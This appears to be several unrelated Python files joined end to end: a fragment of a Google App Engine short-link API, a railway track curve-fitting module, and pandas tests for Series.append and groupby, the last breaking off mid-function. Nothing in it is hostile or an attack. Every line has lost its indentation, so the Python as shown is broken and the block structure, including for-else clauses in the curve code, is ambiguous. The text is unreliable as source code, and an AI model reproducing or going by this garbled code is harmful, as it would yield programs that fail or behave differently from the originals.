@endpoints.method(ListShortLinkMessageRequest, ListShortLinkMessageResponse,
name='list', path='/list', http_method = 'GET')
def listShortLinks(self, request):
""" List all short links.
Gets all short links from the database.
Args:
request: the API request for list
Returns:
A message containing a list of short links.
"""
sl = ShortLink.query().order(-ShortLink.created_date).fetch(request.limit or 20)
outsl = []
for link in sl[:]:
m = ShortLinkMessage(short_link = link.short_link,
target_link = link.target_link,
created_date = link.created_date)
outsl.append(m)
deferred.defer(utils.updateMetric, 'list',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return ListShortLinkMessageResponse(short_links = outsl)
@endpoints.method(ReadShortLinkMessageRequest, ReadShortLinkMessageResponse,
name='read', path='/read', http_method = 'GET')
def readShortLink(self, request):
""" Read a single short link.
Gets a short link from the database.
Args:
request: the API request for read
Returns:
A message containing a short link.
"""
sl = ShortLink.query(ShortLink.short_link == request.short_link).fetch(1)
if len(sl) == 0:
return ReadShortLinkMessageResponse(status = 1,
msg = 'Short link not found')
deferred.defer(utils.updateMetric, 'read',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return ReadShortLinkMessageResponse(status = 0, short_link = sl[0].short_link)
@endpoints.method(DeleteShortLinkMessageRequest,
DeleteShortLinkMessageResponse,
name='remove', path='/remove', http_method = 'DELETE')
def deleteShortLink(self, request):
""" Delete a single short link.
Deletes a short link from the datastore.
Args:
request: the API request for delete
Returns:
A message containing the result
"""
sl = ShortLink.query(ShortLink.short_link == request.short_link).fetch(1)
if len(sl) == 0:
return DeleteShortLinkMessageResponse(status = 1,
msg = 'Short link not found')
sl[0].key.delete()
memcache.delete(request.short_link)
deferred.defer(utils.updateMetric, 'delete',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return DeleteShortLinkMessageResponse(short_link = request.short_link, status = 0)
application = endpoints.api_server([ShortLinkApi])
|
|
# MIT License, copyright Ewan Macpherson, 2016; see LICENCE in root directory
# Curve calculations
from copy import copy
import math
from ec.common import Bearing, LinearEquation
from ec.section import TrackSection
class CurveError(Exception):
pass
class TrackCurve(TrackSection):
""" Group of track sections. Like TrackSection, takes a set of coordinates
as input but utilises methods to create curves with track sections
joining up tracks.
Additonal parameter: 'split' option for whether to split the static
curve section into multiple 500 m sections.
"""
max_length = 500
def __init__(self, curve, minimum, speed, split=True):
super(TrackCurve, self).__init__(curve, minimum, speed)
self.split_static = split
def ts_easement_curve(self, curve, end_curv):
""" Creates a TrackSection instance and returns its easement_curve
method, for operational and reading ease.
"""
ts = TrackSection(curve, self.minimum_radius, self.speed_tolerance)
return ts.easement_curve(end_curv)
def ts_static_curve(self, curve, angle_diff=None, arc_length=None):
""" Creates a TrackSection instance and returns its static_curve
method with 'angle' type, for operational and reading ease.
"""
ts = TrackSection(curve, self.minimum_radius, self.speed_tolerance)
return ts.static_curve(angle_diff, arc_length)
def find_diff_angle(self, other, apply_cw=False):
""" Finds the difference in bearing between the two tracks with
bearing A and B. If A-B > B-A then B is to the right with a
clockwise curve, and vice versa.
If apply_cw is True, will pick side depending on self.clockwise
already set, even if it has the bigger difference in bearing.
"""
# Checks how the 2nd track is aligned wrt the 1st
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
elif (self.start.bearing - other.bearing).rad == math.pi:
# The two tracks are in opposite directions
# Check whether other track is to left or right of the starting track
start_point = (self.start.pos_x, self.start.pos_z)
start_line = LinearEquation(self.start.bearing, start_point)
right_side = (start_point[0] + math.sin(self.start.bearing.rad),
start_point[1] + math.cos(self.start.bearing.rad))
if start_line.dist((other.pos_x, other.pos_z)) == 0:
raise CurveError('The other track is on the same alignment'
' as the starting track.')
diff_b = Bearing(math.pi, rad=True)
cw = start_line.same_side((other.pos_x, other.pos_z), right_side)
if apply_cw and cw is not self.clockwise:
raise CurveError('The starting track is curved away from the '
'other track - cannot make a suitable '
'alignment.')
elif (self.start.bearing - other.bearing).rad > \
(other.bearing - self.start.bearing).rad:
# 2nd track is aligned to the right
diff_b, cw = other.bearing - self.start.bearing, True
else:
# Otherwise 2nd track is aligned to the left
diff_b, cw = self.start.bearing - other.bearing, False
if not apply_cw or self.clockwise is None:
self.clockwise = cw
return diff_b
else:
return diff_b if self.clockwise is cw else -diff_b
def check_start_alignment(self, other):
""" Checks whether the start point is aligned towards the other track -
if it isn't, it will not be possible to extend a curve to join it.
Raises False if it doesn't, True otherwise.
Since LinearEquation.same_side(a, b) returns True if one of the
points is on the line, it follows that this method returns False
if the other alignment lies on the line.
"""
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
elif (self.start.bearing - other.bearing).rad == math.pi:
# Difference 180 deg
return False
else:
# Check how the two points are aligned to each other.
first = LinearEquation(other.bearing, (other.pos_x, other.pos_z))
start_point = (self.start.pos_x, self.start.pos_z)
second = LinearEquation(self.start.bearing, start_point)
intersect = first.intersect(second)
point_beyond = (intersect[0] + math.sin(self.start.bearing.rad),
intersect[1] + math.cos(self.start.bearing.rad))
return not first.same_side(point_beyond, start_point)
def curve_fit_radius(self, other, radius, clockwise=None):
""" Finds a curve with easement sections and static curve of a certain
radius of curvature that fits the two straight tracks.
"""
if radius < self.minimum_radius:
raise CurveError(
'Radius {0} must be greater than the minimum radius of '
'curvature.'.format(radius))
try:
if other.curvature != 0 or self.start.curvature != 0:
raise CurveError('Both tracks must be straight.')
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
elif self.start.bearing.nearly_equal(other.bearing.flip()):
# Can't fit curve of specific radius to two parallel tracks -
# 1) only one valid radius value, 2) can be placed anywhere
# along tracks.
raise CurveError('This method does not work with tracks '
'parallel in opposite directions.')
except AttributeError as err:
raise AttributeError('Tracks 1 and 2 need to be TrackCoord '
'objects.') from err
# Sets signed curvature and angle difference between 2 straight tracks
self.clockwise = clockwise
diff_angle = self.find_diff_angle(other, True)
curvature = -1 / radius if self.clockwise else 1 / radius
# Finds length of easement curve and adjusts angle diff of static curve
easement_length = self.easement_length(curvature)
static_curve_angle = diff_angle.rad - 2 * self.easement_angle(easement_length)
if static_curve_angle < 0:
# Angle diff from two easement curves bigger than angle between
# the two straight tracks; can't fit them in
raise CurveError(
'The easement curves are too long to fit within the curve; '
'consider increasing the radius of curvature.')
# Construct the 3 sections of curve
ec1 = self.ts_easement_curve(self.start, curvature)
static_length = abs(static_curve_angle / curvature)
if not self.split_static or static_length <= self.max_length:
# Single static section
static = self.ts_static_curve(ec1, static_curve_angle)
ec2 = self.ts_easement_curve(static, 0)
# Assembling into a list and copying to ensure no changed values -
# they depend on each other
curve_data = [copy(s) for s in [self.start, ec1, static, ec2]]
else:
sections = math.floor(static_length/self.max_length)
static = []
for s in range(sections):
next_section = static[s-1] if s != 0 else ec1
static += [self.ts_static_curve(next_section,
arc_length=self.max_length)]
remainder = static_length % self.max_length
static += [self.ts_static_curve(static[-1], arc_length=remainder)]
ec2 = self.ts_easement_curve(static[-1], 0)
curve_data = [copy(s) for s in [self.start, ec1] + static + [ec2]]
# Finds the required translation to align the curve with the 2 tracks
# Should already be aligned with 1st
line_track = LinearEquation(other.bearing,
(other.pos_x, other.pos_z))
line_end_point = LinearEquation(self.start.bearing,
(ec2.pos_x, ec2.pos_z))
end_point = line_track.intersect(line_end_point)
# Applies translation to each of the sections
for ts in curve_data:
ts.move(end_point[0] - ec2.pos_x, end_point[1] - ec2.pos_z)
return curve_data
def curve_fit_length(self, other, length, clockwise=None, places=4,
iterations=50):
""" Finds a curve with easement sections and static curve of a certain
length that fits the two tracks, by using the bisection method to
find the correct radius of curvature.
"""
n_floor, n_ceiling = None, None
roc = self.minimum_radius
# Let initial curve_fit_radius eval handle all the CurveExceptions
# Run loop for a set number of iterations
for j in range(iterations):
try:
curve = self.curve_fit_radius(other=other, radius=roc,
clockwise=clockwise)
except CurveError as err:
if 'The easement curves are too long' in str(err):
n_floor = roc
else:
raise
else:
static_length = sum(i.org_length for i in curve if
i.org_type == 'static')
if round(static_length - length, places) == 0:
# Accurate enough
return curve
elif static_length > length:
# Static curve too long - try reducing RoC to increase easement length
n_ceiling = roc
elif static_length < length:
# Static curve too short - try raising RoC to decrease easement length
n_floor = roc
if n_floor is not None:
if n_ceiling is not None:
roc = (n_floor + n_ceiling) / 2
else:
# No ceiling yet, so raise RoC
roc *= 2
else:
# Floor should have been set with first iteration
raise CurveError('The required radius of curvature for static '
'curve of length {} is too small.'
''.format(length))
# Loop runs out of iterations
else:
raise CurveError(
'A suitable alignment was not found after {0} iterations. '
''.format(iterations))
def curve_fit_point(self, other, add_point=None, places=4, iterations=100):
""" Extends a curve with easement sections from a point on a track,
which can be curved, to join with a straight track. Uses the
bisection method to find the correct radius of curvature by
checking if the aligned curve has reached the second track or
overshot.
places: minimum distance between easement curve and 2nd track
iterations: maximum number of iterations before giving up
"""
try:
if other.curvature != 0:
raise CurveError('The end track must be straight.')
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
except AttributeError as err:
raise AttributeError('Tracks 1 and 2 need to be TrackCoord '
'objects.') from err
if add_point is not None:
try:
self.get_static_radius(add_point)
except AttributeError as err:
raise AttributeError('Add_point must be another TrackCoord '
'object.') from err
# Setting clockwise direction if starting curvature is not straight
if self.start.curvature != 0:
self.clockwise = self.start.curvature < 0
diff_angle = self.find_diff_angle(other, True)
if diff_angle.rad > math.pi:
raise CurveError('The curved track is not aligned in the '
'same direction as the other track.')
else:
diff_angle = self.find_diff_angle(other)
if not self.check_start_alignment(other) and not \
self.start.bearing.nearly_equal(other.bearing.flip()):
# Other track behind start point, so flip CW/ACW to create a
# balloon loop instead and recalculate diff_angle
self.clockwise = not self.clockwise
diff_angle = self.find_diff_angle(other, True)
line_other = LinearEquation(bearing=other.bearing,
point=(other.pos_x, other.pos_z))
start_point = (self.start.pos_x, self.start.pos_z)
# Set upper and lower bounds, and set starting curvature
n_floor, n_ceiling = None, None
curvature = 1 / self.minimum_radius
curvature *= -1 if self.clockwise else 1
# If starting curvature is not zero, adjust diff_angle to take into
# account 'negative' section of easement curve
if self.start.curvature != 0:
pre_angle = self.easement_angle(self.easement_length(self.start.curvature))
else:
pre_angle = 0
# Ensuring it runs in a loop with a limited number of iterations
for j in range(iterations):
easement_length = self.easement_length(curvature)
static_curve_angle = diff_angle.rad - self.easement_angle(easement_length) \
- abs(self.easement_angle(easement_length) - pre_angle)
if static_curve_angle < 0:
# RoC too small; set a floor and repeat loop
n_floor = curvature
else:
if self.start.curvature != curvature:
# Usual EC -> Static -> EC setup
ec1 = self.ts_easement_curve(self.start, curvature)
curve_data = [self.start, copy(ec1)]
else:
# Skip the first easement curve
curve_data = [self.start]
static_length = abs(static_curve_angle / curvature)
# Checking if static curve is longer than 500
if not self.split_static or static_length <= self.max_length:
# Single static section
static = self.ts_static_curve(curve_data[-1],
static_curve_angle)
ec2 = self.ts_easement_curve(static, 0)
curve_data += [copy(s) for s in [static, ec2]]
# If split_static is True and longer than 500m, split
else:
sections = math.floor(static_length / self.max_length)
ls_static = []
for s in range(sections):
next_section = ls_static[s-1] if s != 0 else \
curve_data[-1]
ls_static += [self.ts_static_curve(
next_section, arc_length=self.max_length)]
# Adding the remainder section
remainder = static_length % self.max_length
ls_static += [self.ts_static_curve(ls_static[-1],
arc_length=remainder)]
ec2 = self.ts_easement_curve(ls_static[-1], 0)
curve_data += [copy(s) for s in ls_static + [ec2]]
end_point = (curve_data[-1].pos_x, curve_data[-1].pos_z)
if line_other.dist(end_point) < 10 ** (-places):
# Result accurate enough
return curve_data
elif line_other.same_side(start_point, end_point):
# Same side, ie curve hasn't reached the other track -
# need larger RoC
n_floor = curvature
elif not line_other.same_side(start_point, end_point):
# Opposite sides, ie curve overshot - need smaller RoC
n_ceiling = curvature
# Zero length of static curve but still overshot - won't work
elif not line_other.same_side(start_point, end_point) \
and static_curve_angle < 10 ** -3:
raise CurveError(
'The starting point is too close to the second track '
'for this curve - try moving the start point away.')
else:
raise ValueError('Something went wrong here - dist',
line_other.dist(end_point))
if n_floor is not None:
if n_ceiling is not None:
# Both floor and ceiling are set, so find midpoint
curvature = (n_ceiling + n_floor)/2
else:
# Ceiling value is set but not under so reduce RoC
curvature *= 1/2
else:
# Floor should have been set with first iteration
raise CurveError(
'Start point is too close to the straight track such that '
'the required RoC is smaller than the minimum.')
# Loop runs out of iterations
else:
raise CurveError(
'A suitable alignment was not found after {0} iterations. '
''.format(iterations))
|
|
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, Series, Timestamp, date_range
import pandas._testing as tm
class TestSeriesAppend:
def test_append(self, datetime_series, string_series, object_series):
appended_series = string_series.append(object_series)
for idx, value in appended_series.items():
if idx in string_series.index:
assert value == string_series[idx]
elif idx in object_series.index:
assert value == object_series[idx]
else:
raise AssertionError("orphaned index!")
msg = "Indexes have overlapping values:"
with pytest.raises(ValueError, match=msg):
datetime_series.append(datetime_series, verify_integrity=True)
def test_append_many(self, datetime_series):
pieces = [datetime_series[:5], datetime_series[5:10], datetime_series[10:]]
result = pieces[0].append(pieces[1:])
tm.assert_series_equal(result, datetime_series)
def test_append_duplicates(self):
# GH 13677
s1 = pd.Series([1, 2, 3])
s2 = pd.Series([4, 5, 6])
exp = pd.Series([1, 2, 3, 4, 5, 6], index=[0, 1, 2, 0, 1, 2])
tm.assert_series_equal(s1.append(s2), exp)
tm.assert_series_equal(pd.concat([s1, s2]), exp)
# the result must have RangeIndex
exp = pd.Series([1, 2, 3, 4, 5, 6])
tm.assert_series_equal(
s1.append(s2, ignore_index=True), exp, check_index_type=True
)
tm.assert_series_equal(
pd.concat([s1, s2], ignore_index=True), exp, check_index_type=True
)
msg = "Indexes have overlapping values:"
with pytest.raises(ValueError, match=msg):
s1.append(s2, verify_integrity=True)
with pytest.raises(ValueError, match=msg):
pd.concat([s1, s2], verify_integrity=True)
def test_append_tuples(self):
# GH 28410
s = pd.Series([1, 2, 3])
list_input = [s, s]
tuple_input = (s, s)
expected = s.append(list_input)
result = s.append(tuple_input)
tm.assert_series_equal(expected, result)
def test_append_dataframe_raises(self):
# GH 31413
df = pd.DataFrame({"A": [1, 2], "B": [3, 4]})
msg = "to_append should be a Series or list/tuple of Series, got DataFrame"
with pytest.raises(TypeError, match=msg):
df.A.append(df)
with pytest.raises(TypeError, match=msg):
df.A.append([df])
class TestSeriesAppendWithDatetimeIndex:
def test_append(self):
rng = date_range("5/8/2012 1:45", periods=10, freq="5T")
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
result = ts.append(ts)
result_df = df.append(df)
ex_index = DatetimeIndex(np.tile(rng.values, 2))
tm.assert_index_equal(result.index, ex_index)
tm.assert_index_equal(result_df.index, ex_index)
appended = rng.append(rng)
tm.assert_index_equal(appended, ex_index)
appended = rng.append([rng, rng])
ex_index = DatetimeIndex(np.tile(rng.values, 3))
tm.assert_index_equal(appended, ex_index)
# different index names
rng1 = rng.copy()
rng2 = rng.copy()
rng1.name = "foo"
rng2.name = "bar"
assert rng1.append(rng1).name == "foo"
assert rng1.append(rng2).name is None
def test_append_tz(self):
# see gh-2938
rng = date_range("5/8/2012 1:45", periods=10, freq="5T", tz="US/Eastern")
rng2 = date_range("5/8/2012 2:35", periods=10, freq="5T", tz="US/Eastern")
rng3 = date_range("5/8/2012 1:45", periods=20, freq="5T", tz="US/Eastern")
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
ts2 = Series(np.random.randn(len(rng2)), rng2)
df2 = DataFrame(np.random.randn(len(rng2), 4), index=rng2)
result = ts.append(ts2)
result_df = df.append(df2)
tm.assert_index_equal(result.index, rng3)
tm.assert_index_equal(result_df.index, rng3)
appended = rng.append(rng2)
tm.assert_index_equal(appended, rng3)
def test_append_tz_explicit_pytz(self):
# see gh-2938
from pytz import timezone as timezone
rng = date_range(
"5/8/2012 1:45", periods=10, freq="5T", tz=timezone("US/Eastern")
)
rng2 = date_range(
"5/8/2012 2:35", periods=10, freq="5T", tz=timezone("US/Eastern")
)
rng3 = date_range(
"5/8/2012 1:45", periods=20, freq="5T", tz=timezone("US/Eastern")
)
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
ts2 = Series(np.random.randn(len(rng2)), rng2)
df2 = DataFrame(np.random.randn(len(rng2), 4), index=rng2)
result = ts.append(ts2)
result_df = df.append(df2)
tm.assert_index_equal(result.index, rng3)
tm.assert_index_equal(result_df.index, rng3)
appended = rng.append(rng2)
tm.assert_index_equal(appended, rng3)
def test_append_tz_dateutil(self):
# see gh-2938
rng = date_range(
"5/8/2012 1:45", periods=10, freq="5T", tz="dateutil/US/Eastern"
)
rng2 = date_range(
"5/8/2012 2:35", periods=10, freq="5T", tz="dateutil/US/Eastern"
)
rng3 = date_range(
"5/8/2012 1:45", periods=20, freq="5T", tz="dateutil/US/Eastern"
)
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
ts2 = Series(np.random.randn(len(rng2)), rng2)
df2 = DataFrame(np.random.randn(len(rng2), 4), index=rng2)
result = ts.append(ts2)
result_df = df.append(df2)
tm.assert_index_equal(result.index, rng3)
tm.assert_index_equal(result_df.index, rng3)
appended = rng.append(rng2)
tm.assert_index_equal(appended, rng3)
def test_series_append_aware(self):
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H", tz="US/Eastern")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="US/Eastern")
ser1 = Series([1], index=rng1)
ser2 = Series([2], index=rng2)
ts_result = ser1.append(ser2)
exp_index = DatetimeIndex(
["2011-01-01 01:00", "2011-01-01 02:00"], tz="US/Eastern", freq="H"
)
exp = Series([1, 2], index=exp_index)
tm.assert_series_equal(ts_result, exp)
assert ts_result.index.tz == rng1.tz
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H", tz="UTC")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="UTC")
ser1 = Series([1], index=rng1)
ser2 = Series([2], index=rng2)
ts_result = ser1.append(ser2)
exp_index = DatetimeIndex(
["2011-01-01 01:00", "2011-01-01 02:00"], tz="UTC", freq="H"
)
exp = Series([1, 2], index=exp_index)
tm.assert_series_equal(ts_result, exp)
utc = rng1.tz
assert utc == ts_result.index.tz
# GH#7795
# different tz coerces to object dtype, not UTC
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H", tz="US/Eastern")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="US/Central")
ser1 = Series([1], index=rng1)
ser2 = Series([2], index=rng2)
ts_result = ser1.append(ser2)
exp_index = Index(
[
Timestamp("1/1/2011 01:00", tz="US/Eastern"),
Timestamp("1/1/2011 02:00", tz="US/Central"),
]
)
exp = Series([1, 2], index=exp_index)
tm.assert_series_equal(ts_result, exp)
def test_series_append_aware_naive(self):
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="US/Eastern")
ser1 = Series(np.random.randn(len(rng1)), index=rng1)
ser2 = Series(np.random.randn(len(rng2)), index=rng2)
ts_result = ser1.append(ser2)
expected = ser1.index.astype(object).append(ser2.index.astype(object))
assert ts_result.index.equals(expected)
# mixed
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H")
rng2 = range(100)
ser1 = Series(np.random.randn(len(rng1)), index=rng1)
ser2 = Series(np.random.randn(len(rng2)), index=rng2)
ts_result = ser1.append(ser2)
expected = ser1.index.astype(object).append(ser2.index)
assert ts_result.index.equals(expected)
def test_series_append_dst(self):
rng1 = date_range("1/1/2016 01:00", periods=3, freq="H", tz="US/Eastern")
rng2 = date_range("8/1/2016 01:00", periods=3, freq="H", tz="US/Eastern")
ser1 = Series([1, 2, 3], index=rng1)
ser2 = Series([10, 11, 12], index=rng2)
ts_result = ser1.append(ser2)
exp_index = DatetimeIndex(
[
"2016-01-01 01:00",
"2016-01-01 02:00",
"2016-01-01 03:00",
"2016-08-01 01:00",
"2016-08-01 02:00",
"2016-08-01 03:00",
],
tz="US/Eastern",
)
exp = Series([1, 2, 3, 10, 11, 12], index=exp_index)
tm.assert_series_equal(ts_result, exp)
assert ts_result.index.tz == rng1.tz
|
|
import builtins
from io import StringIO
import numpy as np
import pytest
from pandas.errors import UnsupportedFunctionCall
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, Series, Timestamp, date_range, isna
import pandas._testing as tm
import pandas.core.nanops as nanops
from pandas.util import _test_decorators as td
@pytest.fixture(
params=[np.int32, np.int64, np.float32, np.float64],
ids=["np.int32", "np.int64", "np.float32", "np.float64"],
)
def numpy_dtypes_for_minmax(request):
"""
Fixture of numpy dtypes with min and max values used for testing
cummin and cummax
"""
dtype = request.param
min_val = (
np.iinfo(dtype).min if np.dtype(dtype).kind == "i" else np.finfo(dtype).min
)
max_val = (
np.iinfo(dtype).max if np.dtype(dtype).kind == "i" else np.finfo(dtype).max
)
return (dtype, min_val, max_val)
@pytest.mark.parametrize("agg_func", ["any", "all"])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize(
"vals",
[
["foo", "bar", "baz"],
["foo", "", ""],
["", "", ""],
[1, 2, 3],
[1, 0, 0],
[0, 0, 0],
[1.0, 2.0, 3.0],
[1.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[True, True, True],
[True, False, False],
[False, False, False],
[np.nan, np.nan, np.nan],
],
)
def test_groupby_bool_aggs(agg_func, skipna, vals):
df = DataFrame({"key": ["a"] * 3 + ["b"] * 3, "val": vals * 2})
# Figure out expectation using Python builtin
exp = getattr(builtins, agg_func)(vals)
# edge case for missing data with skipna and 'any'
if skipna and all(isna(vals)) and agg_func == "any":
exp = False
exp_df = DataFrame([exp] * 2, columns=["val"], index=Index(["a", "b"], name="key"))
result = getattr(df.groupby("key"), agg_func)(skipna=skipna)
tm.assert_frame_equal(result, exp_df)
def test_max_min_non_numeric():
# #2700
aa = DataFrame({"nn": [11, 11, 22, 22], "ii": [1, 2, 3, 4], "ss": 4 * ["mama"]})
result = aa.groupby("nn").max()
assert "ss" in result
result = aa.groupby("nn").max(numeric_only=False)
assert "ss" in result
result = aa.groupby("nn").min()
assert "ss" in result
result = aa.groupby("nn").min(numeric_only=False)
assert "ss" in result
def test_intercept_builtin_sum():
s = Series([1.0, 2.0, np.nan, 3.0])
grouped = s.groupby([0, 1, 2, 2])
result = grouped.agg(builtins.sum)
result2 = grouped.apply(builtins.sum)
expected = grouped.sum()
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
# @pytest.mark.parametrize("f", [max, min, sum])
# def test_builtins_apply(f):
@pytest.mark.parametrize("f", [max, min, sum])
@pytest.mark.parametrize("keys", ["jim", ["jim", "joe"]]) # Single key # Multi-key
def test_builtins_apply(keys, f):
# see gh-8155
df = pd.DataFrame(np.random.randint(1, 50, (1000, 2)), columns=["jim", "joe"])
df["jolie"] = np.random.randn(1000)
fname = f.__name__
result = df.groupby(keys).apply(f)
ngroups = len(df.drop_duplicates(subset=keys))
assert_msg = f"invalid frame shape: {result.shape} (expected ({ngroups}, 3))"
assert result.shape == (ngroups, 3), assert_msg
tm.assert_frame_equal(
result, # numpy's equivalent function
df.groupby(keys).apply(getattr(np, fname)),
)
if f != sum:
expected = df.groupby(keys).agg(fname).reset_index()
expected.set_index(keys, inplace=True, drop=False)
tm.assert_frame_equal(result, expected, check_dtype=False)
tm.assert_series_equal(getattr(result, fname)(), getattr(df, fname)())
def test_arg_passthru():
# make sure that we are passing thru kwargs
# to our agg functions
# GH3668
# GH5724
df = pd.DataFrame(
{
"group": [1, 1, 2],
"int": [1, 2, 3],
"float": [4.0, 5.0, 6.0],
"string": list("abc"),
"category_string": pd.Series(list("abc")).astype("category"),
"category_int": [7, 8, 9],
"datetime": pd.date_range("20130101", periods=3),
"datetimetz": pd.date_range("20130101", periods=3, tz="US/Eastern"),
"timedelta": pd.timedelta_range("1 s", periods=3, freq="s"),
},
columns=[
"group",
"int",
"float",
"string",
"category_string",
"category_int",
"datetime",
"datetimetz",
"timedelta",
],
)
expected_columns_numeric = Index(["int", "float", "category_int"])
# mean / median
expected = pd.DataFrame(
{
"category_int": [7.5, 9],
"float": [4.5, 6.0],
"timedelta": [pd.Timedelta("1.5s"), pd.Timedelta("3s")],
"int": [1.5, 3],
"datetime": [
pd.Timestamp("2013-01-01 12:00:00"),
pd.Timestamp("2013-01-03 00:00:00"),
],
"datetimetz": [
pd.Timestamp("2013-01-01 12:00:00", tz="US/Eastern"),
pd.Timestamp("2013-01-03 00:00:00", tz="US/Eastern"),
],
},
index=Index([1, 2], name="group"),
columns=["int", "float", "category_int", "datetime", "datetimetz", "timedelta"],
)
for attr in ["mean", "median"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_frame_equal(result.reindex_like(expected), expected)
# TODO: min, max *should* handle
# categorical (ordered) dtype
expected_columns = Index(
[
"int",
"float",
"string",
"category_int",
"datetime",
"datetimetz",
"timedelta",
]
)
for attr in ["min", "max"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(
[
"int",
"float",
"string",
"category_string",
"category_int",
"datetime",
"datetimetz",
"timedelta",
]
)
for attr in ["first", "last"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(["int", "float", "string", "category_int", "timedelta"])
result = df.groupby("group").sum()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = df.groupby("group").sum(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(["int", "float", "category_int"])
for attr in ["prod", "cumprod"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
# like min, max, but don't include strings
expected_columns = Index(
["int", "float", "category_int", "datetime", "datetimetz", "timedelta"]
)
for attr in ["cummin", "cummax"]:
result = getattr(df.groupby("group"), attr)()
# GH 15561: numeric_only=False set by default like min/max
tm.assert_index_equal(result.columns, expected_columns)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(["int", "float", "category_int", "timedelta"])
result = getattr(df.groupby("group"), "cumsum")()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = getattr(df.groupby("group"), "cumsum")(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
def test_non_cython_api():
# GH5610
# non-cython calls should not include the grouper
df = DataFrame(
[[1, 2, "foo"], [1, np.nan, "bar"], [3, np.nan, "baz"]], columns=["A", "B", "C"]
)
g = df.groupby("A")
gni = df.groupby("A", as_index=False)
# mad
expected = DataFrame([[0], [np.nan]], columns=["B"], index=[1, 3])
expected.index.name = "A"
result = g.mad()
tm.assert_frame_equal(result, expected)
expected = DataFrame([[1, 0.0], [3, np.nan]], columns=["A", "B"], index=[0, 1])
result = gni.mad()
tm.assert_frame_equal(result, expected)
# describe
expected_index = pd.Index([1, 3], name="A")
expected_col = pd.MultiIndex(
levels=[["B"], ["count", "mean", "std", "min", "25%", "50%", "75%", "max"]],
codes=[[0] * 8, list(range(8))],
)
expected = pd.DataFrame(
[
[1.0, 2.0, np.nan, 2.0, 2.0, 2.0, 2.0, 2.0],
[0.0, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
],
index=expected_index,
columns=expected_col,
)
result = g.describe()
tm.assert_frame_equal(result, expected)
expected = pd.concat(
[
df[df.A == 1].describe().unstack().to_frame().T,
df[df.A == 3].describe().unstack().to_frame().T,
]
)
expected.index = pd.Index([0, 1])
result = gni.describe()
tm.assert_frame_equal(result, expected)
# any
expected = DataFrame(
[[True, True], [False, True]], columns=["B", "C"], index=[1, 3]
)
expected.index.name = "A"
result = g.any()
tm.assert_frame_equal(result, expected)
# idxmax
expected = DataFrame([[0.0], [np.nan]], columns=["B"], index=[1, 3])
expected.index.name = "A"
result = g.idxmax()
tm.assert_frame_equal(result, expected)
def test_cython_api2():
# this takes the fast apply path
# cumsum (GH5614)
df = DataFrame([[1, 2, np.nan], [1, np.nan, 9], [3, 4, 9]], columns=["A", "B", "C"])
expected = DataFrame([[2, np.nan], [np.nan, 9], [4, 9]], columns=["B", "C"])
result = df.groupby("A").cumsum()
tm.assert_frame_equal(result, expected)
# GH 5755 - cumsum is a transformer and should ignore as_index
result = df.groupby("A", as_index=False).cumsum()
tm.assert_frame_equal(result, expected)
# GH 13994
result = df.groupby("A").cumsum(axis=1)
expected = df.cumsum(axis=1)
tm.assert_frame_equal(result, expected)
result = df.groupby("A").cumprod(axis=1)
expected = df.cumprod(axis=1)
tm.assert_frame_equal(result, expected)
def test_cython_median():
df = DataFrame(np.random.randn(1000))
df.values[::2] = np.nan
labels = np.random.randint(0, 50, size=1000).astype(float)
labels[::17] = np.nan
result = df.groupby(labels).median()
exp = df.groupby(labels).agg(nanops.nanmedian)
tm.assert_frame_equal(result, exp)
df = DataFrame(np.random.randn(1000, 5))
rs = df.groupby(labels).agg(np.median)
xp = df.groupby(labels).median()
tm.assert_frame_equal(rs, xp)
def test_median_empty_bins(observed):
df = pd.DataFrame(np.random.randint(0, 44, 500))
grps = range(0, 55, 5)
bins = pd.cut(df[0], grps)
